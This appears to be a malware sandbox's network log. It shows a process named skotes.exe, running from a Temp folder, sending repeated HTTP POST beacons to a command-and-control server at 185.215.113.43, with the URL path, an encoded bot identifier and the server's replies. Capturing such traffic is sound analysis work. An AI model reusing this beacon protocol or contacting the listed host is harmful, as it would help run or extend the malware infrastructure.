Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50207	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:13.036607981 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:14.399468899 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50228	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:16.152431965 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:17.492866039 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50235	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:19.131704092 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:20.525924921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50239	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:22.274375916 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:23.712764978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50240	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:25.382942915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:26.708947897 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50252	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:28.460587025 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:29.805591106 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50275	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:31.449347019 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:32.797910929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50296	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:34.552690983 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:35.940511942 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50306	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:37.569524050 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:38.952680111 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50310	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:40.693546057 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:42.082746029 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50323	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:43.709630966 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:45.101988077 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50336	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:46.851939917 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:48.229470015 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50343	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:49.865668058 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:51.257313013 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50345	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:52.993266106 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:54.323214054 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50348	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:55.959598064 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:57.353544950 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50350	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:59.116435051 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:00.502609968 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50353	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:02.132677078 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:03.514820099 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.5	49823	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:05.275778055 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:06.652935028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	49825	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:08.287337065 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:09.633805990 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49826	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:11.382698059 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:12.722959995 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49827	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:14.350575924 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:15.750852108 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	49828	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:17.497375965 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:18.929112911 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	49829	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:20.554511070 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:22.017170906 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	49830	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:16:23.775336981 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
